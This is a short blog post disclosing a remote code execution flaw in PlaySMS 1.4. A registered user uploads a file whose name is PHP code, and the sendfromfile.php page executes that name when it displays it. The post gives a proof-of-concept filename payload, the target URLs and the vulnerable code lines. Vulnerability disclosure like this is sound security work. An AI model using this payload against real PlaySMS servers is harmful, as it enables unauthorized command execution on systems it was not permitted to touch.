Skip to content

PlaySMS 1.4 Code Execution in sendfromfile.php

PlaySMS 1.4 allows remote code execution because PHP code in the name of an uploaded .php file is executed. sendfromfile.php has a combination of Unrestricted File Upload and Code Injection.

Unrestricted File Upload:

Any registered user can upload any file because of not proper Validation of file in sendfromfile.

Code Execution using $filename

Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily. but not store in any folder so our shell is useless. But if User change the file name to “mybackdoor.php” to “<?php system(‘uname -a’); dia();?>.php” .Then server check for file and set some perameter $filename=”<?php system(‘uname -a’); dia();?>.php” . you can see code below and display $filename on page.

Proof of Concept

Login as regular user (created using index.php?app=main&inc=core_auth&route=register):

Go to : http://127.0.0.1/playsms/index.php?app=main&inc=feature_sendfromfile&op=list

 

This is Form.

----------------------------Form for upload CSV file ---------------------- <form action=\"index.php?app=main&inc=feature_sendfromfile&op=upload_confirm\" enctype=\"multipart/form-data\" method=\"post\"> " . _CSRF_FORM_ . " <p>" . _('Please select CSV file') . "</p> <p><input type=\"file\" name=\"fncsv\"></p> <p class=help-block>" . _('CSV file format') . " : " . $info_format . "</p> <p><input type=checkbox name=fncsv_dup value=1 checked> " . _('Prevent duplicates') . "</p> <p><input type=\"submit\" value=\"" . _('Upload file') . "\" class=\"button\"></p> </form> ------------------------------Form ends ---------------------------
-------------PHP code for set parameter ---------------------------       case 'upload_confirm':         $filename = $_FILES['fncsv']['name'];   ------------------------------php code ends ---------------------------
$filename will be visible on page:
----------------------Vulnerable perameter show ----------------------   line 123 : $content .= _('Uploaded file') . ': ' . $filename . '<p />';   ----------------------------------------------------------------------

For Video Demo.

Published inPoC

One Comment

  1. 0x3a 0x3a

    Good Job Man

Leave a Reply

Your email address will not be published. Required fields are marked *